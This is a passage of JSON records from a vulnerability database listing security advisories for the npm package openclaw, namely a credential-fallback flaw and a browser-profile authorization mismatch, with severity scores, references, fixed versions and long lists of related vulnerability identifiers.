`gateway.remote.*` credentials in local mode.\n\n## Impact\nThis could cause local CLI and helper paths to select the wrong credential source instead of failing closed for configured local auth SecretRefs. We did not confirm a server-side gateway-authentication boundary bypass for this issue.\n\n## Affected Packages and Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.3.8`\n- Fixed in: `2026.3.11`\n\n## Technical Details\nThe local-mode fallback logic decided whether remote credential fallback was allowed based on resolved credential values rather than on whether the local auth input was actually configured. 
A configured-but-unavailable local SecretRef therefore looked \"absent\" to the helper layer.\n\n## Fix\nOpenClaw now tracks whether the local auth input is configured separately from whether it resolves successfully. In local mode, remote fallback is allowed only when the matching local auth input is truly unset. The fix shipped in `openclaw@2026.3.11`.\n\n## Workarounds\nUpgrade to `2026.3.11` or later.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32970","reference_id":"","reference_type":"","scores":[{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05701","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05715","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00023","scoring_system":"epss","scoring_elements":"0.06774","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32970"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"2.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"2.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qvr7-g57c-mrc7","reference_id":"","reference_type":"","scores":[{"value":"2.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2","scoring
_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:57:45Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qvr7-g57c-mrc7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32970","reference_id":"","reference_type":"","scores":[{"value":"2.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32970"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-credential-fallback-logic-bypass-via-unavailable-local-auth-secretrefs","reference_id":"","reference_type":"","scores":[{"value":"2.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:57:45Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-credential-fallback-logic-bypass-via-unavailable-local-auth-secretrefs"},{"reference_url":"https://github.com/advisories/GHSA-qvr7-g57c-mrc7","reference_id":"GHSA-qvr7-g57c-mrc7","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qvr7-g57c-mrc7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud
6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb
7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zyg
v"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wba
k"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e
2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3a
h"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["CVE-2026-32970","GHSA-qvr7-g57c-mrc7"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1y7e-y41k-qyfc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91883?format=json","vulnerability_id":"VCID-21eb-723m-xkfu","summary":"OpenClaw: 
`browser.request` let `operator.write` persist admin-only browser profile changes\n### Summary\n\nAn authorization mismatch in the gateway let an authenticated caller with only `operator.write` use `browser.request` to reach browser profile management routes that persist configuration to disk. In practice, this exposed an admin-only configuration write primitive through `/profiles/create`.\n\n### Impact\n\nA write-scoped operator could create or modify browser profiles and store attacker-chosen remote CDP endpoints without holding `operator.admin`.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.8`\n\n### Patch\n\nFixed in `openclaw` `2026.3.11` and included in later releases such as `2026.3.12`. Browser profile creation now requires the correct admin boundary, and regression tests cover the write-vs-admin authorization split.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vmhq-cqm9-6p7q","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/o
penclaw/openclaw/security/advisories/GHSA-vmhq-cqm9-6p7q"},{"reference_url":"https://github.com/advisories/GHSA-vmhq-cqm9-6p7q","reference_id":"GHSA-vmhq-cqm9-6p7q","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vmhq-cqm9-6p7q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability
":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability
":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCI